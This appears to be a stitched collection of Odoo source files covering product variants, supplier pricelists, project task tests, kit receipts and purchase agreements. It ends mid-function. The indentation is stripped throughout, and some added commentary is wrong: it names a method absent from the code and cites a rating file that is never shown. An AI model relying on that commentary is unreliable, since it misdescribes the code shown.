product_ids = self._search([('product_tmpl_id.seller_ids', 'in', suppliers_ids)], limit=limit, access_rights_uid=name_get_uid)
else:
product_ids = self._search(args, limit=limit, access_rights_uid=name_get_uid)
return self.browse(product_ids).name_get()
@api.model
def view_header_get(self, view_id, view_type):
res = super(ProductProduct, self).view_header_get(view_id, view_type)
if self._context.get('categ_id'):
return _('Products: ') + self.env['product.category'].browse(self._context['categ_id']).name
return res
@api.multi
def open_product_template(self):
""" Utility method used to add an "Open Template" button in product views """
self.ensure_one()
return {'type': 'ir.actions.act_window',
'res_model': 'product.template',
'view_mode': 'form',
'res_id': self.product_tmpl_id.id,
'target': 'new'}
def _prepare_sellers(self, params):
return self.seller_ids
@api.multi
def _select_seller(self, partner_id=False, quantity=0.0, date=None, uom_id=False, params=False):
self.ensure_one()
if date is None:
date = fields.Date.context_today(self)
precision = self.env['decimal.precision'].precision_get('Product Unit of Measure')
res = self.env['product.supplierinfo']
sellers = self._prepare_sellers(params)
if self.env.context.get('force_company'):
sellers = sellers.filtered(lambda s: not s.company_id or s.company_id.id == self.env.context['force_company'])
for seller in sellers:
# Set quantity in UoM of seller
quantity_uom_seller = quantity
if quantity_uom_seller and uom_id and uom_id != seller.product_uom:
quantity_uom_seller = uom_id._compute_quantity(quantity_uom_seller, seller.product_uom)
if seller.date_start and seller.date_start > date:
continue
if seller.date_end and seller.date_end < date:
continue
if partner_id and seller.name not in [partner_id, partner_id.parent_id]:
continue
if float_compare(quantity_uom_seller, seller.min_qty, precision_digits=precision) == -1:
continue
if seller.product_id and seller.product_id != self:
continue
res |= seller
break
return res
@api.multi
def price_compute(self, price_type, uom=False, currency=False, company=False):
# TDE FIXME: delegate to template or not ? fields are reencoded here ...
# compatibility about context keys used a bit everywhere in the code
if not uom and self._context.get('uom'):
uom = self.env['uom.uom'].browse(self._context['uom'])
if not currency and self._context.get('currency'):
currency = self.env['res.currency'].browse(self._context['currency'])
products = self
if price_type == 'standard_price':
# standard_price field can only be seen by users in base.group_user
# Thus, in order to compute the sale price from the cost for users not in this group
# We fetch the standard price as the superuser
products = self.with_context(force_company=company and company.id or self._context.get('force_company', self.env.user.company_id.id)).sudo()
prices = dict.fromkeys(self.ids, 0.0)
for product in products:
prices[product.id] = product[price_type] or 0.0
if price_type == 'list_price':
prices[product.id] += product.price_extra
# we need to add the price from the attributes that do not generate variants
# (see field product.attribute create_variant)
if self._context.get('no_variant_attributes_price_extra'):
# we have a list of price_extra that comes from the attribute values, we need to sum all that
prices[product.id] += sum(self._context.get('no_variant_attributes_price_extra'))
if uom:
prices[product.id] = product.uom_id._compute_price(prices[product.id], uom)
# Convert from current user company currency to asked one
            # This is right because a field cannot be in more than one currency
if currency:
prices[product.id] = product.currency_id._convert(
prices[product.id], currency, product.company_id, fields.Date.today())
return prices
# compatibility to remove after v10 - DEPRECATED
@api.multi
def price_get(self, ptype='list_price'):
return self.price_compute(ptype)
@api.multi
def _set_standard_price(self, value):
''' Store the standard price change in order to be able to retrieve the cost of a product for a given date'''
PriceHistory = self.env['product.price.history']
for product in self:
PriceHistory.create({
'product_id': product.id,
'cost': value,
'company_id': self._context.get('force_company', self.env.user.company_id.id),
})
@api.multi
def get_history_price(self, company_id, date=None):
history = self.env['product.price.history'].search([
('company_id', '=', company_id),
('product_id', 'in', self.ids),
('datetime', '<=', date or fields.Datetime.now())], order='datetime desc,id desc', limit=1)
return history.cost or 0.0
@api.model
def get_empty_list_help(self, help):
self = self.with_context(
empty_list_help_document_name=_("product"),
)
return super(ProductProduct, self).get_empty_list_help(help)
def get_product_multiline_description_sale(self):
""" Compute a multiline description of this product, in the context of sales
(do not use for purchases or other display reasons that don't intend to use "description_sale").
It will often be used as the default description of a sale order line referencing this product.
"""
name = self.display_name
if self.description_sale:
name += '\n' + self.description_sale
return name
def _has_valid_attributes(self, valid_attributes, valid_values):
""" Check if a product has valid attributes. It is considered valid if:
- it uses ALL valid attributes
- it ONLY uses valid values
We must make sure that all attributes are used to take into account the case where
attributes would be added to the template.
This method does not check if the combination is possible, it just
checks if it has valid attributes and values. A possible combination
is always valid, but a valid combination is not always possible.
:param valid_attributes: a recordset of product.attribute
:param valid_values: a recordset of product.attribute.value
        :return: True if the attributes and values are correct, False otherwise
"""
self.ensure_one()
values = self.attribute_value_ids
attributes = values.mapped('attribute_id')
if attributes != valid_attributes:
return False
for value in values:
if value not in valid_values:
return False
return True
@api.multi
def _is_variant_possible(self, parent_combination=None):
"""Return whether the variant is possible based on its own combination,
and optionally a parent combination.
See `_is_combination_possible` for more information.
This will always exclude variants for templates that have `no_variant`
attributes because the variant itself will not be the full combination.
:param parent_combination: combination from which `self` is an
optional or accessory product.
:type parent_combination: recordset `product.template.attribute.value`
        :return: whether the variant is possible based on its own combination
:rtype: bool
"""
self.ensure_one()
return self.product_tmpl_id._is_combination_possible(self.product_template_attribute_value_ids, parent_combination=parent_combination)
class ProductPackaging(models.Model):
_name = "product.packaging"
_description = "Product Packaging"
_order = 'sequence'
name = fields.Char('Package Type', required=True)
sequence = fields.Integer('Sequence', default=1, help="The first in the sequence is the default one.")
product_id = fields.Many2one('product.product', string='Product')
qty = fields.Float('Contained Quantity', help="The total number of products you can have per pallet or box.")
barcode = fields.Char('Barcode', copy=False, help="Barcode used for packaging identification.")
product_uom_id = fields.Many2one('uom.uom', related='product_id.uom_id', readonly=True)
class SupplierInfo(models.Model):
_name = "product.supplierinfo"
_description = "Supplier Pricelist"
_order = 'sequence, min_qty desc, price'
name = fields.Many2one(
'res.partner', 'Vendor',
domain=[('supplier', '=', True)], ondelete='cascade', required=True,
help="Vendor of this product")
product_name = fields.Char(
'Vendor Product Name',
help="This vendor's product name will be used when printing a request for quotation. Keep empty to use the internal one.")
product_code = fields.Char(
'Vendor Product Code',
help="This vendor's product code will be used when printing a request for quotation. Keep empty to use the internal one.")
sequence = fields.Integer(
'Sequence', default=1, help="Assigns the priority to the list of product vendor.")
product_uom = fields.Many2one(
'uom.uom', 'Unit of Measure',
related='product_tmpl_id.uom_po_id',
help="This comes from the product form.")
min_qty = fields.Float(
'Minimal Quantity', default=0.0, required=True,
help="The minimal quantity to purchase from this vendor, expressed in the vendor Product Unit of Measure if not any, in the default unit of measure of the product otherwise.")
price = fields.Float(
'Price', default=0.0, digits=dp.get_precision('Product Price'),
required=True, help="The price to purchase a product")
company_id = fields.Many2one(
'res.company', 'Company',
default=lambda self: self.env.user.company_id.id, index=1)
currency_id = fields.Many2one(
'res.currency', 'Currency',
default=lambda self: self.env.user.company_id.currency_id.id,
required=True)
date_start = fields.Date('Start Date', help="Start date for this vendor price")
date_end = fields.Date('End Date', help="End date for this vendor price")
product_id = fields.Many2one(
'product.product', 'Product Variant',
help="If not set, the vendor price will apply to all variants of this product.")
product_tmpl_id = fields.Many2one(
'product.template', 'Product Template',
index=True, ondelete='cascade', oldname='product_id')
product_variant_count = fields.Integer('Variant Count', related='product_tmpl_id.product_variant_count', readonly=False)
delay = fields.Integer(
'Delivery Lead Time', default=1, required=True,
help="Lead time in days between the confirmation of the purchase order and the receipt of the products in your warehouse. Used by the scheduler for automatic computation of the purchase order planning.")
@api.model
def get_import_templates(self):
return [{
'label': _('Import Template for Vendor Pricelists'),
'template': '/product/static/xls/product_supplierinfo.xls'
}]
```
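The validity check in `_is_combination_valid` above boils down to two set comparisons: the combination must cover exactly the template's valid attributes, and every chosen value must belong to the valid value set. Below is a rough, self-contained restatement of that rule with plain Python sets standing in for the Odoo recordsets; the attribute/value names and the one-value-per-attribute simplification are assumptions for illustration only, not the ORM implementation.
```python
# Not the ORM code above, just the same rule on plain data.
def is_combination_valid(values_by_attribute, valid_attributes, valid_values):
    # The combination must use exactly the valid attributes (no more, no less)...
    if set(values_by_attribute) != set(valid_attributes):
        return False
    # ...and every chosen value must be one of the valid values.
    return set(values_by_attribute.values()) <= set(valid_values)

# Hypothetical "Color"/"Size" template:
valid_attributes = {"Color", "Size"}
valid_values = {"Red", "Blue", "S", "M"}
print(is_combination_valid({"Color": "Red", "Size": "M"}, valid_attributes, valid_values))    # True
print(is_combination_valid({"Color": "Red"}, valid_attributes, valid_values))                 # False: Size missing
print(is_combination_valid({"Color": "Green", "Size": "M"}, valid_attributes, valid_values))  # False: Green not allowed
```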
#### File: project/tests/test_project_flow.py
```python
import base64
from .test_project_base import TestProjectBase
from odoo.tools import mute_logger
from odoo.modules.module import get_resource_path
EMAIL_TPL = """Return-Path: <<EMAIL>>
X-Original-To: {to}
Delivered-To: {to}
To: {to}
cc: {cc}
Received: by mail1.odoo.com (Postfix, from userid 10002)
id 5DF9ABFB2A; Fri, 10 Aug 2012 16:16:39 +0200 (CEST)
Message-ID: {msg_id}
Date: Tue, 29 Nov 2011 12:43:21 +0530
From: {email_from}
MIME-Version: 1.0
Subject: {subject}
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Hello,
This email should create a new entry in your module. Please check that it
effectively works.
Thanks,
--
<NAME>
Integrator at Agrolait"""
class TestProjectFlow(TestProjectBase):
def test_project_process_project_manager_duplicate(self):
pigs = self.project_pigs.sudo(self.user_projectmanager)
dogs = pigs.copy()
self.assertEqual(len(dogs.tasks), 2, 'project: duplicating a project must duplicate its tasks')
@mute_logger('odoo.addons.mail.mail_thread')
def test_task_process_without_stage(self):
# Do: incoming mail from an unknown partner on an alias creates a new task 'Frogs'
task = self.format_and_process(
EMAIL_TPL, to='<EMAIL>, <EMAIL>', cc='<EMAIL>',
email_from='%s' % self.user_projectuser.email,
subject='Frogs', msg_id='<1198923581.41972151<EMAIL>>',
target_model='project.task')
# Test: one task created by mailgateway administrator
self.assertEqual(len(task), 1, 'project: message_process: a new project.task should have been created')
# Test: check partner in message followers
self.assertIn(self.partner_2, task.message_partner_ids, "Partner in message cc is not added as a task followers.")
# Test: messages
self.assertEqual(len(task.message_ids), 2,
'project: message_process: newly created task should have 2 messages: creation and email')
self.assertEqual(task.message_ids[0].author_id, self.user_projectuser.partner_id,
'project: message_process: second message should be the one from Agrolait (partner failed)')
self.assertEqual(task.message_ids[0].subject, 'Frogs',
'project: message_process: second message should be the one from Agrolait (subject failed)')
# Test: task content
self.assertEqual(task.name, 'Frogs', 'project_task: name should be the email subject')
self.assertEqual(task.project_id.id, self.project_pigs.id, 'project_task: incorrect project')
self.assertEqual(task.stage_id.sequence, False, "project_task: shouldn't have a stage, i.e. sequence=False")
@mute_logger('odoo.addons.mail.mail_thread')
def test_task_process_with_stages(self):
# Do: incoming mail from an unknown partner on an alias creates a new task 'Cats'
task = self.format_and_process(
EMAIL_TPL, to='<EMAIL>, <EMAIL>', cc='<EMAIL>',
email_from='%s' % self.user_projectuser.email,
subject='Cats', msg_id='<119892358<EMAIL>1972<EMAIL>>',
target_model='project.task')
# Test: one task created by mailgateway administrator
self.assertEqual(len(task), 1, 'project: message_process: a new project.task should have been created')
# Test: check partner in message followers
self.assertIn(self.partner_2, task.message_partner_ids, "Partner in message cc is not added as a task followers.")
# Test: messages
self.assertEqual(len(task.message_ids), 2,
'project: message_process: newly created task should have 2 messages: creation and email')
self.assertEqual(task.message_ids[1].subtype_id, self.env.ref('project.mt_task_new'),
'project: message_process: first message of new task should have Task Created subtype')
self.assertEqual(task.message_ids[0].author_id, self.user_projectuser.partner_id,
'project: message_process: second message should be the one from Agrolait (partner failed)')
self.assertEqual(task.message_ids[0].subject, 'Cats',
'project: message_process: second message should be the one from Agrolait (subject failed)')
# Test: task content
self.assertEqual(task.name, 'Cats', 'project_task: name should be the email subject')
self.assertEqual(task.project_id.id, self.project_goats.id, 'project_task: incorrect project')
self.assertEqual(task.stage_id.sequence, 1, "project_task: should have a stage with sequence=1")
def test_subtask_process(self):
""" Check subtask mecanism and change it from project. """
Task = self.env['project.task'].with_context({'tracking_disable': True})
parent_task = Task.create({
'name': '<NAME>',
'user_id': self.user_projectuser.id,
'project_id': self.project_pigs.id,
'partner_id': self.partner_2.id,
'planned_hours': 12,
})
child_task = Task.create({
'name': '<NAME>',
'parent_id': parent_task.id,
'project_id': self.project_pigs.id,
'planned_hours': 3,
})
        self.assertEqual(parent_task.partner_id, child_task.partner_id, "Subtask should have the same partner as its parent")
self.assertEqual(parent_task.subtask_count, 1, "Parent task should have 1 child")
self.assertEqual(parent_task.subtask_planned_hours, 3, "Planned hours of subtask should impact parent task")
# change project
child_task.write({
'project_id': self.project_goats.id # customer is partner_1
})
self.assertEqual(parent_task.partner_id, child_task.partner_id, "Subtask partner should not change when changing project")
def test_rating(self):
"""Check if rating works correctly even when task is changed from project A to project B"""
Task = self.env['project.task'].with_context({'tracking_disable': True})
first_task = Task.create({
'name': '<NAME>',
'user_id': self.user_projectuser.id,
'project_id': self.project_pigs.id,
'partner_id': self.partner_2.id,
})
self.assertEqual(first_task.rating_count, 0, "Task should have no rating associated with it")
Rating = self.env['rating.rating']
rating_good = Rating.create({
'res_model_id': self.env['ir.model']._get('project.task').id,
'res_id': first_task.id,
'parent_res_model_id': self.env['ir.model']._get('project.project').id,
'parent_res_id': self.project_pigs.id,
'rated_partner_id': self.partner_2.id,
'partner_id': self.partner_2.id,
'rating': 10,
'consumed': False,
})
rating_bad = Rating.create({
'res_model_id': self.env['ir.model']._get('project.task').id,
'res_id': first_task.id,
'parent_res_model_id': self.env['ir.model']._get('project.project').id,
'parent_res_id': self.project_pigs.id,
'rated_partner_id': self.partner_2.id,
'partner_id': self.partner_2.id,
'rating': 5,
'consumed': True,
})
# We need to invalidate cache since it is not done automatically by the ORM
# Our One2Many is linked to a res_id (int) for which the orm doesn't create an inverse
first_task.invalidate_cache()
self.assertEqual(rating_good.rating_text, 'satisfied')
self.assertEqual(rating_bad.rating_text, 'not_satisfied')
self.assertEqual(first_task.rating_count, 1, "Task should have only one rating associated, since one is not consumed")
self.assertEqual(rating_good.parent_res_id, self.project_pigs.id)
self.assertEqual(self.project_goats.percentage_satisfaction_task, -1)
self.assertEqual(self.project_pigs.percentage_satisfaction_task, -1)
# Consuming rating_good
first_task.rating_apply(10, rating_good.access_token)
# We need to invalidate cache since it is not done automatically by the ORM
# Our One2Many is linked to a res_id (int) for which the orm doesn't create an inverse
first_task.invalidate_cache()
self.assertEqual(first_task.rating_count, 2, "Task should have two ratings associated with it")
self.assertEqual(rating_good.parent_res_id, self.project_pigs.id)
self.assertEqual(self.project_goats.percentage_satisfaction_task, -1)
self.assertEqual(self.project_pigs.percentage_satisfaction_task, 50)
# We change the task from project_pigs to project_goats, ratings should be associated with the new project
first_task.project_id = self.project_goats.id
# We need to invalidate cache since it is not done automatically by the ORM
# Our One2Many is linked to a res_id (int) for which the orm doesn't create an inverse
first_task.invalidate_cache()
self.assertEqual(rating_good.parent_res_id, self.project_goats.id)
self.assertEqual(self.project_goats.percentage_satisfaction_task, 50)
self.assertEqual(self.project_pigs.percentage_satisfaction_task, -1)
```
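A note on why `test_rating` expects `'satisfied'` for a value of 10 and `'not_satisfied'` for a value of 5: the textual rating is derived from the numeric value with fixed thresholds defined in the rating module (reproduced in `rating/models/rating.py` further below). A standalone sketch of that mapping, mirroring `_compute_rating_text`:
```python
RATING_LIMIT_SATISFIED = 7
RATING_LIMIT_OK = 3
RATING_LIMIT_MIN = 1

def rating_text(rating):
    # Same threshold logic as rating.rating._compute_rating_text.
    if rating >= RATING_LIMIT_SATISFIED:
        return 'satisfied'
    elif rating > RATING_LIMIT_OK:
        return 'not_satisfied'
    elif rating >= RATING_LIMIT_MIN:
        return 'highly_dissatisfied'
    return 'no_rating'

assert rating_text(10) == 'satisfied'
assert rating_text(5) == 'not_satisfied'
assert rating_text(2) == 'highly_dissatisfied'
assert rating_text(0) == 'no_rating'
```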
#### File: purchase_mrp/models/purchase_mrp.py
```python
from odoo import fields, models
from odoo.tools import float_compare
class MrpProduction(models.Model):
_inherit = 'mrp.production'
def _get_document_iterate_key(self, move_raw_id):
return super(MrpProduction, self)._get_document_iterate_key(move_raw_id) or 'created_purchase_line_id'
class PurchaseOrderLine(models.Model):
_inherit = 'purchase.order.line'
def _update_received_qty(self):
super(PurchaseOrderLine, self)._update_received_qty()
for line in self.filtered(lambda x: x.move_ids and x.product_id.id not in x.move_ids.mapped('product_id').ids):
bom = self.env['mrp.bom']._bom_find(product=line.product_id, company_id=line.company_id.id)
if bom and bom.type == 'phantom':
line.qty_received = line._get_bom_delivered(bom=bom)
def _get_bom_delivered(self, bom=False):
self.ensure_one()
# In the case of a kit, we need to check if all components are shipped. Since the BOM might
# have changed, we don't compute the quantities but verify the move state.
if bom:
moves = self.move_ids.filtered(lambda m: m.picking_id and m.picking_id.state != 'cancel')
bom_delivered = all([move.state == 'done' for move in moves])
if bom_delivered:
return self.product_qty
else:
return 0.0
def _get_upstream_documents_and_responsibles(self, visited):
return [(self.order_id, self.order_id.user_id, visited)]
class StockMove(models.Model):
_inherit = 'stock.move'
def _prepare_phantom_move_values(self, bom_line, quantity):
vals = super(StockMove, self)._prepare_phantom_move_values(bom_line, quantity)
if self.purchase_line_id:
vals['purchase_line_id'] = self.purchase_line_id.id
return vals
```
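The `_get_bom_delivered` helper above makes the received quantity of a kit (phantom BOM) purchase line all-or-nothing: either every component move is done and the full ordered quantity counts as received, or nothing does. A minimal restatement on plain data, ignoring the cancelled-picking filtering done by the ORM code (function and variable names are illustrative only):
```python
def kit_qty_received(ordered_qty, component_move_states):
    # The kit counts as received only once every component move is 'done'.
    if component_move_states and all(state == 'done' for state in component_move_states):
        return ordered_qty
    return 0.0

print(kit_qty_received(5.0, ['done', 'done']))      # 5.0 -> every component shipped
print(kit_qty_received(5.0, ['done', 'assigned']))  # 0.0 -> one component still pending
```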
#### File: purchase_requisition/models/purchase_requisition.py
```python
from datetime import datetime, time
from odoo import api, fields, models, _
from odoo.addons import decimal_precision as dp
from odoo.exceptions import UserError
PURCHASE_REQUISITION_STATES = [
('draft', 'Draft'),
('ongoing', 'Ongoing'),
('in_progress', 'Confirmed'),
('open', 'Bid Selection'),
('done', 'Closed'),
('cancel', 'Cancelled')
]
class PurchaseRequisitionType(models.Model):
_name = "purchase.requisition.type"
_description = "Purchase Requisition Type"
_order = "sequence"
name = fields.Char(string='Agreement Type', required=True, translate=True)
sequence = fields.Integer(default=1)
exclusive = fields.Selection([
('exclusive', 'Select only one RFQ (exclusive)'), ('multiple', 'Select multiple RFQ')],
string='Agreement Selection Type', required=True, default='multiple',
help="""Select only one RFQ (exclusive): when a purchase order is confirmed, cancel the remaining purchase order.\n
Select multiple RFQ: allows multiple purchase orders. On confirmation of a purchase order it does not cancel the remaining orders""")
quantity_copy = fields.Selection([
('copy', 'Use quantities of agreement'), ('none', 'Set quantities manually')],
string='Quantities', required=True, default='none')
line_copy = fields.Selection([
('copy', 'Use lines of agreement'), ('none', 'Do not create RfQ lines automatically')],
string='Lines', required=True, default='copy')
class PurchaseRequisition(models.Model):
_name = "purchase.requisition"
_description = "Purchase Requisition"
_inherit = ['mail.thread']
_order = "id desc"
def _get_picking_in(self):
pick_in = self.env.ref('stock.picking_type_in', raise_if_not_found=False)
company = self.env['res.company']._company_default_get('purchase.requisition')
if not pick_in or pick_in.sudo().warehouse_id.company_id.id != company.id:
pick_in = self.env['stock.picking.type'].search(
[('warehouse_id.company_id', '=', company.id), ('code', '=', 'incoming')],
limit=1,
)
return pick_in
def _get_type_id(self):
return self.env['purchase.requisition.type'].search([], limit=1)
name = fields.Char(string='Agreement Reference', required=True, copy=False, default='New', readonly=True)
origin = fields.Char(string='Source Document')
order_count = fields.Integer(compute='_compute_orders_number', string='Number of Orders')
vendor_id = fields.Many2one('res.partner', string="Vendor")
type_id = fields.Many2one('purchase.requisition.type', string="Agreement Type", required=True, default=_get_type_id)
ordering_date = fields.Date(string="Ordering Date", track_visibility='onchange')
date_end = fields.Datetime(string='Agreement Deadline', track_visibility='onchange')
schedule_date = fields.Date(string='Delivery Date', index=True, help="The expected and scheduled delivery date where all the products are received", track_visibility='onchange')
user_id = fields.Many2one('res.users', string='Purchase Representative', default= lambda self: self.env.user)
description = fields.Text()
company_id = fields.Many2one('res.company', string='Company', required=True, default=lambda self: self.env['res.company']._company_default_get('purchase.requisition'))
purchase_ids = fields.One2many('purchase.order', 'requisition_id', string='Purchase Orders', states={'done': [('readonly', True)]})
line_ids = fields.One2many('purchase.requisition.line', 'requisition_id', string='Products to Purchase', states={'done': [('readonly', True)]}, copy=True)
warehouse_id = fields.Many2one('stock.warehouse', string='Warehouse')
state = fields.Selection(PURCHASE_REQUISITION_STATES,
'Status', track_visibility='onchange', required=True,
copy=False, default='draft')
state_blanket_order = fields.Selection(PURCHASE_REQUISITION_STATES, compute='_set_state')
picking_type_id = fields.Many2one('stock.picking.type', 'Operation Type', required=True, default=_get_picking_in)
is_quantity_copy = fields.Selection(related='type_id.quantity_copy', readonly=True)
currency_id = fields.Many2one('res.currency', 'Currency', required=True,
default=lambda self: self.env.user.company_id.currency_id.id)
@api.depends('state')
def _set_state(self):
self.state_blanket_order = self.state
@api.onchange('vendor_id')
def _onchange_vendor(self):
requisitions = self.env['purchase.requisition'].search([
('vendor_id', '=', self.vendor_id.id),
('state', '=', 'ongoing'),
('type_id.quantity_copy', '=', 'none'),
])
if any(requisitions):
title = _("Warning for %s") % self.vendor_id.name
message = _("There is already an open blanket order for this supplier. We suggest you to use to complete this open blanket order instead of creating a new one.")
warning = {
'title': title,
'message': message
}
return {'warning': warning}
@api.multi
@api.depends('purchase_ids')
def _compute_orders_number(self):
for requisition in self:
requisition.order_count = len(requisition.purchase_ids)
@api.multi
def action_cancel(self):
# try to set all associated quotations to cancel state
for requisition in self:
for requisition_line in requisition.line_ids:
requisition_line.supplier_info_ids.unlink()
requisition.purchase_ids.button_cancel()
for po in requisition.purchase_ids:
po.message_post(body=_('Cancelled by the agreement associated to this quotation.'))
self.write({'state': 'cancel'})
@api.multi
def action_in_progress(self):
self.ensure_one()
if not all(obj.line_ids for obj in self):
raise UserError(_("You cannot confirm agreement '%s' because there is no product line.") % self.name)
if self.type_id.quantity_copy == 'none' and self.vendor_id:
for requisition_line in self.line_ids:
if requisition_line.price_unit <= 0.0:
raise UserError(_('You cannot confirm the blanket order without price.'))
if requisition_line.product_qty <= 0.0:
raise UserError(_('You cannot confirm the blanket order without quantity.'))
requisition_line.create_supplier_info()
self.write({'state': 'ongoing'})
else:
self.write({'state': 'in_progress'})
# Set the sequence number regarding the requisition type
if self.name == 'New':
if self.is_quantity_copy != 'none':
self.name = self.env['ir.sequence'].next_by_code('purchase.requisition.purchase.tender')
else:
self.name = self.env['ir.sequence'].next_by_code('purchase.requisition.blanket.order')
@api.multi
def action_open(self):
self.write({'state': 'open'})
def action_draft(self):
self.ensure_one()
self.name = 'New'
self.write({'state': 'draft'})
@api.multi
def action_done(self):
"""
        Generate all purchase orders based on selected lines; should only be called on one agreement at a time
"""
if any(purchase_order.state in ['draft', 'sent', 'to approve'] for purchase_order in self.mapped('purchase_ids')):
raise UserError(_('You have to cancel or validate every RfQ before closing the purchase requisition.'))
for requisition in self:
for requisition_line in requisition.line_ids:
requisition_line.supplier_info_ids.unlink()
self.write({'state': 'done'})
def _prepare_tender_values(self, product_id, product_qty, product_uom, location_id, name, origin, values):
        return {
'origin': origin,
'date_end': values['date_planned'],
'warehouse_id': values.get('warehouse_id') and values['warehouse_id'].id or False,
'company_id': values['company_id'].id,
'line_ids': [(0, 0, {
'product_id': product_id.id,
'product_uom_id': product_uom.id,
'product_qty': product_qty,
'move_dest_id': values.get('move_dest_ids') and values['move_dest_ids'][0].id or False,
})],
}
def unlink(self):
if any(requisition.state not in ('draft', 'cancel') for requisition in self):
raise UserError(_('You can only delete draft requisitions.'))
# Draft requisitions could have some requisition lines.
self.mapped('line_ids').unlink()
return super(PurchaseRequisition, self).unlink()
class SupplierInfo(models.Model):
_inherit = "product.supplierinfo"
_order = 'sequence, purchase_requisition_id desc, min_qty desc, price'
purchase_requisition_id = fields.Many2one('purchase.requisition', related='purchase_requisition_line_id.requisition_id', string='Blanket order', readonly=False)
purchase_requisition_line_id = fields.Many2one('purchase.requisition.line')
class PurchaseRequisitionLine(models.Model):
_name = "purchase.requisition.line"
_description = "Purchase Requisition Line"
_rec_name = 'product_id'
product_id = fields.Many2one('product.product', string='Product', domain=[('purchase_ok', '=', True)], required=True)
product_uom_id = fields.Many2one('uom.uom', string='Product Unit of Measure')
product_qty = fields.Float(string='Quantity', digits=dp.get_precision('Product Unit of Measure'))
price_unit = fields.Float(string='Unit Price', digits=dp.get_precision('Product Price'))
qty_ordered = fields.Float(compute='_compute_ordered_qty', string='Ordered Quantities')
requisition_id = fields.Many2one('purchase.requisition', required=True, string='Purchase Agreement', ondelete='cascade')
company_id = fields.Many2one('res.company', related='requisition_id.company_id', string='Company', store=True, readonly=True, default= lambda self: self.env['res.company']._company_default_get('purchase.requisition.line'))
account_analytic_id = fields.Many2one('account.analytic.account', string='Analytic Account')
analytic_tag_ids = fields.Many2many('account.analytic.tag', string='Analytic Tags')
schedule_date = fields.Date(string='Scheduled Date')
move_dest_id = fields.Many2one('stock.move', 'Downstream Move')
supplier_info_ids = fields.One2many('product.supplierinfo', 'purchase_requisition_line_id')
@api.model
    def create(self, vals):
res = super(PurchaseRequisitionLine, self).create(vals)
if res.requisition_id.state not in ['draft', 'cancel', 'done'] and res.requisition_id.is_quantity_copy == 'none':
supplier_infos = self.env['product.supplierinfo'].search([
('product_id', '=', vals.get('product_id')),
('name', '=', res.requisition_id.vendor_id.id),
])
if not any([s.purchase_requisition_id for s in supplier_infos]):
res.create_supplier_info()
if vals['price_unit'] <= 0.0:
raise UserError(_('You cannot confirm the blanket order without price.'))
return res
@api.multi
def write(self, vals):
res = super(PurchaseRequisitionLine, self).write(vals)
if 'price_unit' in vals:
if vals['price_unit'] <= 0.0:
raise UserError(_('You cannot confirm the blanket order without price.'))
# If the price is updated, we have to update the related SupplierInfo
self.supplier_info_ids.write({'price': vals['price_unit']})
return res
def unlink(self):
to_unlink = self.filtered(lambda r: r.requisition_id.state not in ['draft', 'cancel', 'done'])
to_unlink.mapped('supplier_info_ids').unlink()
return super(PurchaseRequisitionLine, self).unlink()
def create_supplier_info(self):
purchase_requisition = self.requisition_id
if purchase_requisition.type_id.quantity_copy == 'none' and purchase_requisition.vendor_id:
# create a supplier_info only in case of blanket order
self.env['product.supplierinfo'].create({
'name': purchase_requisition.vendor_id.id,
'product_id': self.product_id.id,
'product_tmpl_id': self.product_id.product_tmpl_id.id,
'price': self.price_unit,
'currency_id': self.requisition_id.currency_id.id,
'purchase_requisition_id': purchase_requisition.id,
'purchase_requisition_line_id': self.id,
})
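        # Why a product.supplierinfo is created here: for a blanket order the
        # negotiated price becomes a regular vendor pricelist entry, so the
        # standard purchase flows can pick it up when sourcing the product.
        # action_cancel() and action_done() above unlink these entries again
        # once the agreement stops being applicable.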
@api.multi
@api.depends('requisition_id.purchase_ids.state')
def _compute_ordered_qty(self):
for line in self:
total = 0.0
for po in line.requisition_id.purchase_ids.filtered(lambda purchase_order: purchase_order.state in ['purchase', 'done']):
for po_line in po.order_line.filtered(lambda order_line: order_line.product_id == line.product_id):
if po_line.product_uom != line.product_uom_id:
total += po_line.product_uom._compute_quantity(po_line.product_qty, line.product_uom_id)
else:
total += po_line.product_qty
line.qty_ordered = total
@api.onchange('product_id')
def _onchange_product_id(self):
if self.product_id:
self.product_uom_id = self.product_id.uom_po_id
self.product_qty = 1.0
if not self.schedule_date:
self.schedule_date = self.requisition_id.schedule_date
@api.multi
def _prepare_purchase_order_line(self, name, product_qty=0.0, price_unit=0.0, taxes_ids=False):
self.ensure_one()
requisition = self.requisition_id
if requisition.schedule_date:
date_planned = datetime.combine(requisition.schedule_date, time.min)
else:
date_planned = datetime.now()
return {
'name': name,
'product_id': self.product_id.id,
'product_uom': self.product_id.uom_po_id.id,
'product_qty': product_qty,
'price_unit': price_unit,
'taxes_id': [(6, 0, taxes_ids)],
'date_planned': date_planned,
'account_analytic_id': self.account_analytic_id.id,
'analytic_tag_ids': self.analytic_tag_ids.ids,
'move_dest_ids': self.move_dest_id and [(4, self.move_dest_id.id)] or []
}
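        # A note on the (0, 0, vals) / (4, id) / (6, 0, ids) tuples used in the
        # dictionaries returned by this file: these are the standard Odoo
        # one2many/many2many write commands --
        #   (0, 0, vals)  create a new record from vals and link it,
        #   (4, id)       link an existing record,
        #   (6, 0, ids)   replace the whole set of linked records with ids.
        # So 'taxes_id': [(6, 0, taxes_ids)] replaces the line's taxes, while
        # 'move_dest_ids': [(4, move_id)] links a destination move without
        # touching the other linked moves.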
class PurchaseOrder(models.Model):
_inherit = "purchase.order"
requisition_id = fields.Many2one('purchase.requisition', string='Purchase Agreement', copy=False)
is_quantity_copy = fields.Selection(related='requisition_id.is_quantity_copy', readonly=False)
@api.onchange('requisition_id')
def _onchange_requisition_id(self):
if not self.requisition_id:
return
requisition = self.requisition_id
if self.partner_id:
partner = self.partner_id
else:
partner = requisition.vendor_id
payment_term = partner.property_supplier_payment_term_id
FiscalPosition = self.env['account.fiscal.position']
fpos = FiscalPosition.get_fiscal_position(partner.id)
fpos = FiscalPosition.browse(fpos)
self.partner_id = partner.id
self.fiscal_position_id = fpos.id
self.payment_term_id = payment_term.id
self.company_id = requisition.company_id.id
self.currency_id = requisition.currency_id.id
if not self.origin or requisition.name not in self.origin.split(', '):
if self.origin:
if requisition.name:
self.origin = self.origin + ', ' + requisition.name
else:
self.origin = requisition.name
self.notes = requisition.description
self.date_order = fields.Datetime.now()
self.picking_type_id = requisition.picking_type_id.id
if requisition.type_id.line_copy != 'copy':
return
# Create PO lines if necessary
order_lines = []
for line in requisition.line_ids:
# Compute name
product_lang = line.product_id.with_context({
'lang': partner.lang,
'partner_id': partner.id,
})
name = product_lang.display_name
if product_lang.description_purchase:
name += '\n' + product_lang.description_purchase
# Compute taxes
